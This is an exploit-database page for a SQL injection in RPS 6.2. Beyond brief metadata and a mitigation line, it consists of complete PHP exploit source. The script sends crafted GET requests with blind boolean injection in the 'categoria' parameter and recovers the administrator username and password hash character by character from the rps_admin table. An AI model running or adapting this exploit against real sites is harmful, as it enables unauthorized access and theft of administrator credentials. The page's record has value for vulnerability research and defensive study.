header-logo
Suggest Exploit
vendor:
RPS
by:
s0cratex
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: RPS
Affected Version From: 6.2
Affected Version To: 6.2
Patch Exists: NO
Related CWE:
CPE: a:rps_project:rps:6.2
Metasploit:
Other Scripts:
Platforms Tested:
2007

RPS 6.2 SQL Injection Exploit

This exploit allows an attacker to retrieve the username and password from the RPS 6.2 system using SQL injection.

Mitigation:

To mitigate this vulnerability, ensure that the magic_quotes_gpc setting is turned on and implement proper input validation and parameterized queries.
Source

Exploit-DB raw data:

<?
//RPS 6.2 SQL Injection Exploit
//http://www.rps-project.com/

//Need magic_quotes_gpc = Off;
//by s0cratex
//Contact: s0cratex[at]hotmail[dot]com

//Salu2: rgod, 0pt1x 'n mechas.

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

$host = "localhost"; $path="/rps"; $id=1;

echo "RPS 6.2 SQL Injection exploit\n-----------------------------\n\n";
echo "Username: ";
$j=1;$result="";
while(!strstr($result,chr(0))){
for($x=0;$x<255;$x++){
$cnx = fsockopen($host,80);
fwrite($cnx, "GET ".$path."/?x=ver_descarga&e=mostrar&categoria=-1'/**/OR/**/1=(SELECT/**/(IF((ASCII(SUBSTRING(username,".$j.",1))=".$x."),1,0))FROM/**/rps_admin/**/WHERE/**/id=".$id.")/* HTTP/1.0\r\nHost: ".$host."\r\n\r\n");
while(!feof($cnx)){ if(ereg("Descargar", fgets($cnx))){ $result .= chr($x);
echo chr($x); break; } }
fclose($cnx);
if ($x==255) {
die("\n Try again...");
}
}
$j++;
}
echo "\n";
echo "Password: ";
$a=1;$result2="";
while(!strstr($result2,chr(0))){
for($i=0;$i<255;$i++){
$cnx2 = fsockopen($host,80);
fwrite($cnx2, "GET ".$path."/?x=ver_descarga&e=mostrar&categoria=-1'/**/OR/**/1=(SELECT/**/(IF((ASCII(SUBSTRING(password,".$a.",1))=".$i."),1,0))FROM/**/rps_admin/**/WHERE/**/id=".$id.")/* HTTP/1.0\r\nHost: ".$host."\r\n\r\n");
while(!feof($cnx2)){ if(ereg("Descargar", fgets($cnx2))){ $result2 .=
chr($i); echo chr($i); break; } }
fclose($cnx2);
if ($i==255) {
die("\n Try again...");
}
}
$a++;
}
echo "\nThe password has been encrypted with crypt() function...\n-----------------------------\n  by s0cratex";
?>

# milw0rm.com [2007-03-04]